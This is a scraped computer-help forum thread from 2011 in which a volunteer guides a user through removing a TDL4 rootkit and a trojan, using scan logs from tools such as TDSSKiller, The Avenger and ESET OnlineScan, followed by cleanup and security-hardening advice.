2011/05/26 22:33:50.0134 4576iirsp (8c3951ad2fe886ef76c7b5027c3125d3) C:\Windows\system32\drivers\iirsp.sys
2011/05/26 22:33:50.0208 4576IntcAzAudAddService (490947a9aff7ca31ef2e08f5776105eb) C:\Windows\system32\drivers\RTKVHD64.sys
2011/05/26 22:33:50.0299 4576intelide (df797a12176f11b2d301c5b234bb200e) C:\Windows\system32\drivers\intelide.sys
2011/05/26 22:33:50.0316 4576intelppm (bfd84af32fa1bad6231c4585cb469630) C:\Windows\system32\DRIVERS\intelppm.sys
2011/05/26 22:33:50.0368 4576IpFilterDriver (d8aabc341311e4780d6fce8c73c0ad81) C:\Windows\system32\DRIVERS\ipfltdrv.sys
2011/05/26 22:33:50.0432 4576IPMIDRV (9c2ee2e6e5a7203bfae15c299475ec67) C:\Windows\system32\drivers\ipmidrv.sys
2011/05/26 22:33:50.0459 4576IPNAT (b7e6212f581ea5f6ab0c3a6ceeeb89be) C:\Windows\system32\DRIVERS\ipnat.sys
2011/05/26 22:33:50.0490 4576IRENUM (8c42ca155343a2f11d29feca67faa88d) C:\Windows\system32\drivers\irenum.sys
2011/05/26 22:33:50.0524 4576isapnp (0672bfcedc6fc468a2b0500d81437f4f) C:\Windows\system32\drivers\isapnp.sys
2011/05/26 22:33:50.0568 4576iScsiPrt (e4fdf99599f27ec25d2cf6d754243520) C:\Windows\system32\DRIVERS\msiscsi.sys
2011/05/26 22:33:50.0597 4576iteatapi (63c766cdc609ff8206cb447a65abba4a) C:\Windows\system32\drivers\iteatapi.sys
2011/05/26 22:33:50.0622 4576iteraid (1281fe73b17664631d12f643cbea3f59) C:\Windows\system32\drivers\iteraid.sys
2011/05/26 22:33:50.0643 4576kbdclass (423696f3ba6472dd17699209b933bc26) C:\Windows\system32\DRIVERS\kbdclass.sys
2011/05/26 22:33:50.0689 4576kbdhid (dbdf75d51464fbc47d0104ec3d572c05) C:\Windows\system32\DRIVERS\kbdhid.sys
2011/05/26 22:33:50.0753 4576KSecDD (476e2c1dcea45895994bef11c2a98715) C:\Windows\system32\Drivers\ksecdd.sys
2011/05/26 22:33:50.0777 4576ksthunk (1d419cf43db29396ecd7113d129d94eb) C:\Windows\system32\drivers\ksthunk.sys
2011/05/26 22:33:50.0950 4576Lavasoft Kernexplorer (9a7fa6371f68335fd3c3d6488bc5a9f8) C:\Program Files (x86)\Lavasoft\Ad-Aware\KernExplorer64.sys
2011/05/26 22:33:50.0977 4576lltdio (96ece2659b6654c10a0c310ae3a6d02c) C:\Windows\system32\DRIVERS\lltdio.sys
2011/05/26 22:33:51.0057 4576LSI_FC (acbe1af32d3123e330a07bfbc5ec4a9b) C:\Windows\system32\drivers\lsi_fc.sys
2011/05/26 22:33:51.0086 4576LSI_SAS (799ffb2fc4729fa46d2157c0065b3525) C:\Windows\system32\drivers\lsi_sas.sys
2011/05/26 22:33:51.0112 4576LSI_SCSI (f445ff1daad8a226366bfaf42551226b) C:\Windows\system32\drivers\lsi_scsi.sys
2011/05/26 22:33:51.0127 4576luafv (52f87b9cc8932c2a7375c3b2a9be5e3e) C:\Windows\system32\drivers\luafv.sys
2011/05/26 22:33:51.0166 4576megasas (5c5cd6aaced32fb26c3fb34b3dcf972f) C:\Windows\system32\drivers\megasas.sys
2011/05/26 22:33:51.0197 4576MegaSR (859bc2436b076c77c159ed694acfe8f8) C:\Windows\system32\drivers\megasr.sys
2011/05/26 22:33:51.0245 4576MEMSWEEP2 (1595fecffbe9ea2417e06d5fd0bfa4c4) C:\Windows\system32\59F1.tmp
2011/05/26 22:33:51.0278 4576Modem (59848d5cc74606f0ee7557983bb73c2e) C:\Windows\system32\drivers\modem.sys
2011/05/26 22:33:51.0317 4576monitor (c247cc2a57e0a0c8c6dccf7807b3e9e5) C:\Windows\system32\DRIVERS\monitor.sys
2011/05/26 22:33:51.0358 4576mouclass (9367304e5e412b120cf5f4ea14e4e4f1) C:\Windows\system32\DRIVERS\mouclass.sys
2011/05/26 22:33:51.0372 4576mouhid (c2c2bd5c5ce5aaf786ddd74b75d2ac69) C:\Windows\system32\DRIVERS\mouhid.sys
2011/05/26 22:33:51.0412 4576MountMgr (11bc9b1e8801b01f7f6adb9ead30019b) C:\Windows\system32\drivers\mountmgr.sys
2011/05/26 22:33:51.0440 4576mpio (f8276eb8698142884498a528dfea8478) C:\Windows\system32\drivers\mpio.sys
2011/05/26 22:33:51.0464 4576mpsdrv (c92b9abdb65a5991e00c28f13491dba2) C:\Windows\system32\drivers\mpsdrv.sys
2011/05/26 22:33:51.0498 4576Mraid35x (3c200630a89ef2c0864d515b7a75802e) C:\Windows\system32\drivers\mraid35x.sys
2011/05/26 22:33:51.0576 4576MRxDAV (7c1de4aa96dc0c071611f9e7de02a68d) C:\Windows\system32\drivers\mrxdav.sys
2011/05/26 22:33:51.0622 4576mrxsmb (dc434b4769e18da09ce1b7755d4c64e9) C:\Windows\system32\DRIVERS\mrxsmb.sys
2011/05/26 22:33:51.0667 4576mrxsmb10 (64713fcfe3de8881d62f8f3f2f794241) C:\Windows\system32\DRIVERS\mrxsmb10.sys
2011/05/26 22:33:51.0742 4576mrxsmb20 (0005c599a2abf767a815afcd32e523e3) C:\Windows\system32\DRIVERS\mrxsmb20.sys
2011/05/26 22:33:51.0770 4576msahci (1ac860612b85d8e85ee257d372e39f4d) C:\Windows\system32\drivers\msahci.sys
2011/05/26 22:33:51.0796 4576msdsm (264bbb4aaf312a485f0e44b65a6b7202) C:\Windows\system32\drivers\msdsm.sys
2011/05/26 22:33:51.0824 4576Msfs (704f59bfc4512d2bb0146aec31b10a7c) C:\Windows\system32\drivers\Msfs.sys
2011/05/26 22:33:51.0854 4576msisadrv (00ebc952961664780d43dca157e79b27) C:\Windows\system32\drivers\msisadrv.sys
2011/05/26 22:33:51.0899 4576MSKSSRV (0ea73e498f53b96d83dbfca074ad4cf8) C:\Windows\system32\drivers\MSKSSRV.sys
2011/05/26 22:33:51.0917 4576MSPCLOCK (52e59b7e992a58e740aa63f57edbae8b) C:\Windows\system32\drivers\MSPCLOCK.sys
2011/05/26 22:33:51.0933 4576MSPQM (49084a75bae043ae02d5b44d02991bb2) C:\Windows\system32\drivers\MSPQM.sys
2011/05/26 22:33:51.0978 4576MsRPC (dc6ccf440cdede4293db41c37a5060a5) C:\Windows\system32\drivers\MsRPC.sys
2011/05/26 22:33:52.0004 4576mssmbios (855796e59df77ea93af46f20155bf55b) C:\Windows\system32\DRIVERS\mssmbios.sys
2011/05/26 22:33:52.0032 4576MSTEE (86d632d75d05d5b7c7c043fa3564ae86) C:\Windows\system32\drivers\MSTEE.sys
2011/05/26 22:33:52.0054 4576Mup (0cc49f78d8aca0877d885f149084e543) C:\Windows\system32\Drivers\mup.sys
2011/05/26 22:33:52.0119 4576NativeWifiP (2007b826c4acd94ae32232b41f0842b9) C:\Windows\system32\DRIVERS\nwifi.sys
2011/05/26 22:33:52.0177 4576NDIS (65950e07329fcee8e6516b17c8d0abb6) C:\Windows\system32\drivers\ndis.sys
2011/05/26 22:33:52.0207 4576NdisTapi (64df698a425478e321981431ac171334) C:\Windows\system32\DRIVERS\ndistapi.sys
2011/05/26 22:33:52.0226 4576Ndisuio (8baa43196d7b5bb972c9a6b2bbf61a19) C:\Windows\system32\DRIVERS\ndisuio.sys
2011/05/26 22:33:52.0271 4576NdisWan (f8158771905260982ce724076419ef19) C:\Windows\system32\DRIVERS\ndiswan.sys
2011/05/26 22:33:52.0294 4576NDProxy (9cb77ed7cb72850253e973a2d6afdf49) C:\Windows\system32\drivers\NDProxy.sys
2011/05/26 22:33:52.0312 4576NetBIOS (a499294f5029a7862adc115bda7371ce) C:\Windows\system32\DRIVERS\netbios.sys
2011/05/26 22:33:52.0358 4576netbt (fc2c792ebddc8e28df939d6a92c83d61) C:\Windows\system32\DRIVERS\netbt.sys
2011/05/26 22:33:52.0410 4576nfrd960 (4ac08bd6af2df42e0c3196d826c8aea7) C:\Windows\system32\drivers\nfrd960.sys
2011/05/26 22:33:52.0465 4576Npfs (b298874f8e0ea93f06ec40aa8d146478) C:\Windows\system32\drivers\Npfs.sys
2011/05/26 22:33:52.0484 4576nsiproxy (1523af19ee8b030ba682f7a53537eaeb) C:\Windows\system32\drivers\nsiproxy.sys
2011/05/26 22:33:52.0560 4576Ntfs (bac869dfb98e499ba4d9bb1fb43270e1) C:\Windows\system32\drivers\Ntfs.sys
2011/05/26 22:33:52.0593 4576Null (dd5d684975352b85b52e3fd5347c20cb) C:\Windows\system32\drivers\Null.sys
2011/05/26 22:33:52.0624 4576nvraid (2c040b7ada5b06f6facadac8514aa034) C:\Windows\system32\drivers\nvraid.sys
2011/05/26 22:33:52.0647 4576nvstor (f7ea0fe82842d05eda3efdd376dbfdba) C:\Windows\system32\drivers\nvstor.sys
2011/05/26 22:33:52.0683 4576nv_agp (19067ca93075ef4823e3938a686f532f) C:\Windows\system32\drivers\nv_agp.sys
2011/05/26 22:33:52.0766 4576ohci1394 (b5b1ce65ac15bbd11c0619e3ef7cfc28) C:\Windows\system32\DRIVERS\ohci1394.sys
2011/05/26 22:33:52.0814 4576Parport (aecd57f94c887f58919f307c35498ea0) C:\Windows\system32\drivers\parport.sys
2011/05/26 22:33:52.0869 4576partmgr (f9b5eda4c17a2be7663f064dbf0fe254) C:\Windows\system32\drivers\partmgr.sys
2011/05/26 22:33:52.0983 4576PCD5SRVC{8AAF211B-043E02A9-05040000} (7204f835a4355d1ab2853e57c9ff177c) C:\PROGRA~1\PC-DOC~1\PCD5SRVC_x64.pkms
2011/05/26 22:33:53.0012 4576pci (47ab1e0fc9d0e12bb53ba246e3a0906d) C:\Windows\system32\drivers\pci.sys
2011/05/26 22:33:53.0042 4576pciide (8d618c829034479985a9ed56106cc732) C:\Windows\system32\drivers\pciide.sys
2011/05/26 22:33:53.0077 4576pcmcia (037661f3d7c507c9993b7010ceee6288) C:\Windows\system32\drivers\pcmcia.sys
2011/05/26 22:33:53.0114 4576PEAUTH (58865916f53592a61549b04941bfd80d) C:\Windows\system32\drivers\peauth.sys
2011/05/26 22:33:53.0244 4576PptpMiniport (23386e9952025f5f21c368971e2e7301) C:\Windows\system32\DRIVERS\raspptp.sys
2011/05/26 22:33:53.0285 4576Processor (5080e59ecee0bc923f14018803aa7a01) C:\Windows\system32\drivers\processr.sys
2011/05/26 22:33:53.0325 4576PSched (c5ab7f0809392d0da027f4a2a81bfa31) C:\Windows\system32\DRIVERS\pacer.sys
2011/05/26 22:33:53.0373 4576ql2300 (0b83f4e681062f3839be2ec1d98fd94a) C:\Windows\system32\drivers\ql2300.sys
2011/05/26 22:33:53.0430 4576ql40xx (e1c80f8d4d1e39ef9595809c1369bf2a) C:\Windows\system32\drivers\ql40xx.sys
2011/05/26 22:33:53.0467 4576QWAVEdrv (e8d76edab77ec9c634c27b8eac33adc5) C:\Windows\system32\drivers\qwavedrv.sys
2011/05/26 22:33:53.0492 4576RasAcd (1013b3b663a56d3ddd784f581c1bd005) C:\Windows\system32\DRIVERS\rasacd.sys
2011/05/26 22:33:53.0524 4576Rasl2tp (ac7bc4d42a7e558718dfdec599bbfc2c) C:\Windows\system32\DRIVERS\rasl2tp.sys
2011/05/26 22:33:53.0574 4576RasPppoe (4517fbf8b42524afe4ede1de102aae3e) C:\Windows\system32\DRIVERS\raspppoe.sys
2011/05/26 22:33:53.0611 4576RasSstp (c6a593b51f34c33e5474539544072527) C:\Windows\system32\DRIVERS\rassstp.sys
2011/05/26 22:33:53.0662 4576rdbss (322db5c6b55e8d8ee8d6f358b2aaabb1) C:\Windows\system32\DRIVERS\rdbss.sys
2011/05/26 22:33:53.0677 4576RDPCDD (603900cc05f6be65ccbf373800af3716) C:\Windows\system32\DRIVERS\RDPCDD.sys
2011/05/26 22:33:53.0708 4576rdpdr (c045d1fb111c28df0d1be8d4bda22c06) C:\Windows\system32\drivers\rdpdr.sys
2011/05/26 22:33:53.0724 4576RDPENCDD (cab9421daf3d97b33d0d055858e2c3ab) C:\Windows\system32\drivers\rdpencdd.sys
2011/05/26 22:33:53.0770 4576RDPWD (b1d741c87cea8d7282146366cc9c3f81) C:\Windows\system32\drivers\RDPWD.sys
2011/05/26 22:33:53.0820 4576rspndr (22a9cb08b1a6707c1550c6bf099aae73) C:\Windows\system32\DRIVERS\rspndr.sys
2011/05/26 22:33:53.0867 4576RT73 (13ab57d5aff258e8713a9b65cc04120e) C:\Windows\system32\DRIVERS\Dr71WU.sys
2011/05/26 22:33:53.0917 4576RTL8169 (8b91737da75add21cb1554b38089196a) C:\Windows\system32\DRIVERS\Rtlh64.sys
2011/05/26 22:33:53.0973 4576SASDIFSV (99df79c258b3342b6c8a5f802998de56) C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS
2011/05/26 22:33:53.0984 4576SASKUTIL (2859c35c0651e8eb0d86d48e740388f2) C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS
2011/05/26 22:33:54.0010 4576sbp2port (cd9c693589c60ad59bbbcfb0e524e01b) C:\Windows\system32\drivers\sbp2port.sys
2011/05/26 22:33:54.0045 4576SBRE (7e07d2a5b910c71d6474e9aa0eaa1825) C:\Windows\system32\drivers\SBREdrv.sys
2011/05/26 22:33:54.0088 4576secdrv (3ea8a16169c26afbeb544e0e48421186) C:\Windows\system32\drivers\secdrv.sys
2011/05/26 22:33:54.0118 4576Serenum (f71bfe7ac6c52273b7c82cbf1bb2a222) C:\Windows\system32\drivers\serenum.sys
2011/05/26 22:33:54.0144 4576Serial (e62fac91ee288db29a9696a9d279929c) C:\Windows\system32\drivers\serial.sys
2011/05/26 22:33:54.0172 4576sermouse (a842f04833684bceea7336211be478df) C:\Windows\system32\drivers\sermouse.sys
2011/05/26 22:33:54.0219 4576sffdisk (14d4b4465193a87c127933978e8c4106) C:\Windows\system32\drivers\sffdisk.sys
2011/05/26 22:33:54.0250 4576sffp_mmc (7073aee3f82f3d598e3825962aa98ab2) C:\Windows\system32\drivers\sffp_mmc.sys
2011/05/26 22:33:54.0263 4576sffp_sd (35e59ebe4a01a0532ed67975161c7b82) C:\Windows\system32\drivers\sffp_sd.sys
2011/05/26 22:33:54.0287 4576sfloppy (6b7838c94135768bd455cbdc23e39e5f) C:\Windows\system32\drivers\sfloppy.sys
2011/05/26 22:33:54.0319 4576SiSRaid2 (7a5de502aeb719d4594c6471060a78b3) C:\Windows\system32\drivers\sisraid2.sys
2011/05/26 22:33:54.0349 4576SiSRaid4 (3a2f769fab9582bc720e11ea1dfb184d) C:\Windows\system32\drivers\sisraid4.sys
2011/05/26 22:33:54.0421 4576SmartDefragDriver (327383124d31ac398b98f4ae300421e8) C:\Windows\system32\Drivers\SmartDefragDriver.sys
2011/05/26 22:33:54.0470 4576Smb (290b6f6a0ec4fcdfc90f5cb6d7020473) C:\Windows\system32\DRIVERS\smb.sys
2011/05/26 22:33:54.0540 4576spldr (386c3c63f00a7040c7ec5e384217e89d) C:\Windows\system32\drivers\spldr.sys
2011/05/26 22:33:54.0610 4576srv (880a57fccb571ebd063d4dd50e93e46d) C:\Windows\system32\DRIVERS\srv.sys
2011/05/26 22:33:54.0656 4576srv2 (fa36d119249bf27bc4c0079734e1f33b) C:\Windows\system32\DRIVERS\srv2.sys
2011/05/26 22:33:54.0701 4576srvnet (cfe7bc92d52c7e79427545909a0182f8) C:\Windows\system32\DRIVERS\srvnet.sys
2011/05/26 22:33:54.0754 4576swenum (8a851ca908b8b974f89c50d2e18d4f0c) C:\Windows\system32\DRIVERS\swenum.sys
2011/05/26 22:33:54.0794 4576Symc8xx (2f26a2c6fc96b29beff5d8ed74e6625b) C:\Windows\system32\drivers\symc8xx.sys
2011/05/26 22:33:54.0826 4576Sym_hi (a909667976d3bccd1df813fed517d837) C:\Windows\system32\drivers\sym_hi.sys
2011/05/26 22:33:54.0853 4576Sym_u3 (36887b56ec2d98b9c362f6ae4de5b7b0) C:\Windows\system32\drivers\sym_u3.sys
2011/05/26 22:33:54.0939 4576Tcpip (0011810b5211fdacd784de585262ecfe) C:\Windows\system32\drivers\tcpip.sys
2011/05/26 22:33:55.0017 4576Tcpip6 (0011810b5211fdacd784de585262ecfe) C:\Windows\system32\DRIVERS\tcpip.sys
2011/05/26 22:33:55.0059 4576tcpipreg (ce3ae2ba7a076f0ade9f48c598c1d15d) C:\Windows\system32\drivers\tcpipreg.sys
2011/05/26 22:33:55.0084 4576TDPIPE (1d8bf4aaa5fb7a2761475781dc1195bc) C:\Windows\system32\drivers\tdpipe.sys
2011/05/26 22:33:55.0113 4576TDTCP (7f7e00cdf609df657f4cda02dd1c9bb1) C:\Windows\system32\drivers\tdtcp.sys
2011/05/26 22:33:55.0158 4576tdx (458919c8c42e398dc4802178d5ffee27) C:\Windows\system32\DRIVERS\tdx.sys
2011/05/26 22:33:55.0195 4576TermDD (8c19678d22649ec002ef2282eae92f98) C:\Windows\system32\DRIVERS\termdd.sys
2011/05/26 22:33:55.0245 4576tssecsrv (9e5409cd17c8bef193aad498f3bc2cb8) C:\Windows\system32\DRIVERS\tssecsrv.sys
2011/05/26 22:33:55.0299 4576tunmp (89ec74a9e602d16a75a4170511029b3c) C:\Windows\system32\DRIVERS\tunmp.sys
2011/05/26 22:33:55.0332 4576tunnel (30a9b3f45ad081bffc3bcaa9c812b609) C:\Windows\system32\DRIVERS\tunnel.sys
2011/05/26 22:33:55.0367 4576uagp35 (fec266ef401966311744bd0f359f7f56) C:\Windows\system32\drivers\uagp35.sys
2011/05/26 22:33:55.0411 4576udfs (faf2640a2a76ed03d449e443194c4c34) C:\Windows\system32\DRIVERS\udfs.sys
2011/05/26 22:33:55.0452 4576uliagpkx (4ec9447ac3ab462647f60e547208ca00) C:\Windows\system32\drivers\uliagpkx.sys
2011/05/26 22:33:55.0484 4576uliahci (697f0446134cdc8f99e69306184fbbb4) C:\Windows\system32\drivers\uliahci.sys
2011/05/26 22:33:55.0517 4576UlSata (31707f09846056651ea2c37858f5ddb0) C:\Windows\system32\drivers\ulsata.sys
2011/05/26 22:33:55.0544 4576ulsata2 (85e5e43ed5b48c8376281bab519271b7) C:\Windows\system32\drivers\ulsata2.sys
2011/05/26 22:33:55.0559 4576umbus (46e9a994c4fed537dd951f60b86ad3f4) C:\Windows\system32\DRIVERS\umbus.sys
2011/05/26 22:33:55.0624 4576USBAAPL64 (54d4b48d443e7228bf64cf7cdc3118ac) C:\Windows\system32\Drivers\usbaapl64.sys
2011/05/26 22:33:55.0657 4576usbccgp (07e3498fc60834219d2356293da0fecc) C:\Windows\system32\DRIVERS\usbccgp.sys
2011/05/26 22:33:55.0686 4576usbcir (9247f7e0b65852c1f6631480984d6ed2) C:\Windows\system32\drivers\usbcir.sys
2011/05/26 22:33:55.0739 4576usbehci (827e44de934a736ea31e91d353eb126f) C:\Windows\system32\DRIVERS\usbehci.sys
2011/05/26 22:33:55.0796 4576usbhub (bb35cd80a2ececfadc73569b3d70c7d1) C:\Windows\system32\DRIVERS\usbhub.sys
2011/05/26 22:33:55.0824 4576usbohci (eba14ef0c07cec233f1529c698d0d154) C:\Windows\system32\drivers\usbohci.sys
2011/05/26 22:33:55.0859 4576usbprint (28b693b6d31e7b9332c1bdcefef228c1) C:\Windows\system32\DRIVERS\usbprint.sys
2011/05/26 22:33:55.0893 4576usbscan (ea0bf666868964fbe8cb10e50c97b9f1) C:\Windows\system32\DRIVERS\usbscan.sys
2011/05/26 22:33:55.0920 4576USBSTOR (b854c1558fca0c269a38663e8b59b581) C:\Windows\system32\DRIVERS\USBSTOR.SYS
2011/05/26 22:33:55.0936 4576usbuhci (b2872cbf9f47316abd0e0c74a1aba507) C:\Windows\system32\DRIVERS\usbuhci.sys
2011/05/26 22:33:55.0970 4576vga (916b94bcf1e09873fff2d5fb11767bbc) C:\Windows\system32\DRIVERS\vgapnp.sys
2011/05/26 22:33:55.0997 4576VgaSave (b83ab16b51feda65dd81b8c59d114d63) C:\Windows\System32\drivers\vga.sys
2011/05/26 22:33:56.0023 4576viaide (8294b6c3fdb6c33f24e150de647ecdaa) C:\Windows\system32\drivers\viaide.sys
2011/05/26 22:33:56.0047 4576volmgr (2b7e885ed951519a12c450d24535dfca) C:\Windows\system32\drivers\volmgr.sys
2011/05/26 22:33:56.0102 4576volmgrx (cec5ac15277d75d9e5dec2e1c6eaf877) C:\Windows\system32\drivers\volmgrx.sys
2011/05/26 22:33:56.0150 4576volsnap (5280aada24ab36b01a84a6424c475c8d) C:\Windows\system32\drivers\volsnap.sys
2011/05/26 22:33:56.0184 4576vsmraid (a68f455ed2673835209318dd61bfbb0e) C:\Windows\system32\drivers\vsmraid.sys
2011/05/26 22:33:56.0237 4576WacomPen (fef8fe5923fead2cee4dfabfce3393a7) C:\Windows\system32\drivers\wacompen.sys
2011/05/26 22:33:56.0287 4576Wanarp (b8e7049622300d20ba6d8be0c47c0cfd) C:\Windows\system32\DRIVERS\wanarp.sys
2011/05/26 22:33:56.0298 4576Wanarpv6 (b8e7049622300d20ba6d8be0c47c0cfd) C:\Windows\system32\DRIVERS\wanarp.sys
2011/05/26 22:33:56.0340 4576Wd (0c17a0816f65b89e362e682ad5e7266e) C:\Windows\system32\drivers\wd.sys
2011/05/26 22:33:56.0380 4576Wdf01000 (d02e7e4567da1e7582fbf6a91144b0df) C:\Windows\system32\drivers\Wdf01000.sys
2011/05/26 22:33:56.0508 4576WmiAcpi (e18aebaaa5a773fe11aa2c70f65320f5) C:\Windows\system32\drivers\wmiacpi.sys
2011/05/26 22:33:56.0578 4576ws2ifsl (8a900348370e359b6bff6a550e4649e1) C:\Windows\system32\drivers\ws2ifsl.sys
2011/05/26 22:33:56.0620 4576WUDFRd (501a65252617b495c0f1832f908d54d8) C:\Windows\system32\DRIVERS\WUDFRd.sys
2011/05/26 22:33:56.0709 4576{55662437-DA8C-40c0-AADA-2C816A897A49} (1cacfef9e5dd866c5b79a135ee729e18) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\000.fcl
2011/05/26 22:33:56.0726 4576MBR (0x1B8) (13af81ffe36981a6a5910f5f7a43b4f8) \Device\Harddisk0\DR0
2011/05/26 22:33:56.0734 4576\Device\Harddisk0\DR0 - detected Rootkit.Win32.TDSS.tdl4 (0)
2011/05/26 22:33:56.0739 4576================================================================================
2011/05/26 22:33:56.0739 4576Scan finished
2011/05/26 22:33:56.0739 4576================================================================================
2011/05/26 22:33:56.0755 4372Detected object count: 1
2011/05/26 22:33:56.0755 4372Actual detected object count: 1
2011/05/26 22:34:09.0589 4372\Device\Harddisk0\DR0 (Rootkit.Win32.TDSS.tdl4) - will be cured after reboot
2011/05/26 22:34:09.0589 4372\Device\Harddisk0\DR0 - ok
2011/05/26 22:34:09.0589 4372Rootkit.Win32.TDSS.tdl4(\Device\Harddisk0\DR0) - User select action: Cure
2011/05/26 22:34:12.0188 3188Deinitialize success
Please try running Rooter.exe again.Still not workingOk. Let's try this:

AVENGER

  • Download The Avenger by Swandog46 from here.
  • Unzip/extract it to a folder on your desktop.
  • Double click on avenger.exe to run The Avenger.
  • Click OK.
  • Make sure that the box next to Scan for rootkits has a tick in it and that the box next to Automatically disable any rootkits found does not have a tick in it.
  • Click the EXECUTE button.
  • You will be asked No script has been entered. Do you want to execute a rootkit scan only?.
  • Click Yes.
  • You will now be asked First step completed --- The Avenger has been successfully set up to run on next boot. Reboot now?.
  • Click Yes.
  • Your PC will now be rebooted.
  • After your PC has completed the necessary reboots, a log should automatically open. If it does not automatically open, then the log can be found at %systemdrive%\avenger.txt (typically C:\avenger.txt).
  • Please post this log in your next reply.
I ran the avenger and then rebooted the PC as asked, but there weren't any logs saved.I'd like to scan your machine with ESET OnlineScan

•Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan
•Click the button.
•For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the icon on your desktop.
•Check
•Click the button.
•Accept any security warnings from your browser.
•Check
•Push the Start button.
•ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
•When the scan completes, push
•Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
•Push the button.
•Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt
[emailprotected] as downloader log:
all ok
# version=7
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6427
# api_version=3.0.2
# EOSSerial=4cd547e8b930814f8818bec7ba500350
# end=finished
# remove_checked=true
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2011-05-27 10:43:45
# local_time=2011-05-27 11:43:45 (+0000, Hora de Verão de GMT)
# country="Portugal"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode=512 16777215 100 0 502107 502107 0 0
# compatibility_mode=1024 16777215 100 0 0 0 0 0
# compatibility_mode=5892 16776574 100 56 391430 144052601 0 0
# compatibility_mode=8192 67108863 100 0 348 348 0 0
# scanned=209108
# found=1
# cleaned=1
# scan_time=7529
C:\Users\Ramiro\Desktop\Stuff\FCT\Wolfram Mathematica\M7Win.part1.rarprobably a variant of Win32/Agent.HCHLLEJ trojan (deleted - quarantined)00000000000000000000000000000000C
I really don't mind continuing these procedures (as there's always malware that we're not aware of ), but it seems like the problem that first made me come here, has been fixed. Adding to that, my internet connection seems to be working a lot better (even though the signal has been oscilating a lot according my Internet Provider), the PC boot time and the general flow of the computer has been great since you've started to help me.

I also took the liberty to follow other tutorials, such as cleaning the hardware, used different defragment software, free'd disk space, etc.


I appreciate all the help and the patience Dave. That's ok. We're finished. Let's do some clean up

To remove all of the tools we used and the files and folders they created do the following:
Double click OTL.exe.
  • Click the CleanUp button.
  • Select Yes when the "Begin cleanup Process?" prompt appears.
  • If you are prompted to Reboot during the cleanup, select Yes.
  • The tool will delete itself once it finishes.
Note: If any tool, file or folder (belonging to the program we have used) hasn't been deleted, please delete it manually.
*************************************************
To set a new Restore Point.

Click Start button , click Control Panel, click System and Maintenance, and then clicking System. In the left pane, click System Protection. If you are prompted for an administrator password or confirmation, type the password or provide confirmation. To turn off System Protection for a hard disk, clear the check box next to the disk, and then click OK. Reboot to Normal Mode.
Click the Start button , click Control Panel, click System and Maintenance, and then click System.
In the left pane, click System Protection. If you are prompted for an administrator password or confirmation, type the password or provide confirmation.
To turn on System Protection for a hard disk, select the check box next to the disk, and then click OK.
This will give you a new, clean Restore Point.
****************************************************
Clean out your temporary internet files and temp files.

Download TFC by OldTimer to your desktop.

Double-click TFC.exe to run it.

Note: If you are running on Vista, right-click on the file and choose Run As Administrator

TFC will close all programs when run, so make sure you have saved all your work before you begin.

* Click the Start button to begin the cleaning process.
* Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.
* Please let TFC run uninterrupted until it is finished.

Once TFC is finished it should restart your computer. If it does not, please manually restart the computer yourself to ensure a complete cleaning.
**************************************************
Looking over your log it seems you don't have any evidence of a third party firewall.

Firewalls protect against hackers and malicious intruders. You need to download a free firewall from one of these reliable vendors.

Remember only install ONE firewall

1) Comodo Personal Firewall (Uncheck during installation "Install Comodo SafeSurf..", Make Comodo my default search provider" and "Make Comodo Search my homepage" and uncheck any HopSurf and/or Ask.com options if you choose this one)
2) Online Armor
3) Agnitum Outpost
4) PC Tools Firewall Plus

If you are using the built-in Windows XP firewall, it is not recommended as it does not block outgoing connections. This means that any malware on your computer is free to "phone home" for more instructions. Simply put, Windows XP contains a mediocre firewall. This firewall is NO replacement for a dedicated software solution. Remember to use only one firewall at the same time.
***************************************************************
Use the Secunia Software Inspector to check for out of date software.

•Click Start Now

•Check the box next to Enable thorough system inspection.

•Click Start

•Allow the scan to finish and scroll down to see if any updates are needed.
•Update anything listed.
.
----------

Go to Microsoft Windows Update and get all critical updates.

----------

I suggest using WOT - Web of Trust. WOT is a free Internet security addon for your browser. It will keep you safe from online scams, identity THEFT, spyware, spam, viruses and unreliable shopping sites. WOT warns you before you interact with a risky website. It's easy and it's free.

SpywareBlaster- Secure your Internet Explorer to make it harder for ActiveX programs to run on your computer. Also stop certain cookies from being added to your computer when running Mozilla based browsers like FIREFOX.
* Using SpywareBlaster to protect your computer from Spyware and Malware
* If you don't know what ActiveX controls are, see here

Protect yourself against spyware using the Immunize feature in Spybot - Search & Destroy. Guide: Use Spybot's Immunize Feature to prevent spyware infection in real-time. Note: To ensure you have the latest Immunizations always update Spybot - Search & Destroy before Immunizing. Spybot - Search & Destroy FAQ

Check out Keeping Yourself Safe On The Web for tips and free tools to help keep you safe in the future.

Also see Slow Computer? It may not be Malware for free cleaning/maintenance tools to help keep your computer running smoothly.
Safe Surfing!
Hi SuperDave,

I'm still working through your last instructions and just wanted to Thank You for all your assistance. I really appreciate your time and skilled knowledge.
Discussion
3270.

Solve : Security service keeps disabeling?

Answer»

Quote from: SuperDave on May 27, 2011, 01:24:21 PM

What browser are you using? Try download it with this method.
If you can't access the internet with your infected computer you will have to download and transfer any programs to the computer you're using now and transfer them to the infected computer with a CD-RW or a USB storage device. I prefer a CD because a storage device can get infected. If you use a storage device hold the shift key down while inserting the USB storage device for about 10 secs. You will also have to transfer the logs you receive back to the good computer using the same method until we can get the computer back on-line.

I got it i think the site was down when i was trying to download it... but ill run it right now....Rooter.exe (v1.0.2) by Eric_71
.
SeDebugPrivilege granted successfully ...
.
Windows 7 . (6.1.7601) Service Pack 1
[32_bits] - Intel64 Family 6 Model 23 Stepping 10, GenuineIntel
.
[wscsvc] (Security Center) RUNNING (state:4)
[MpsSvc] RUNNING (state:4)
Windows Firewall -> Enabled
Windows Defender -> Disabled !
User Account Control (UAC) -> Enabled
.
Internet Explorer 9.0.8112.16421
Mozilla Firefox 4.0.1 (en-US)
.
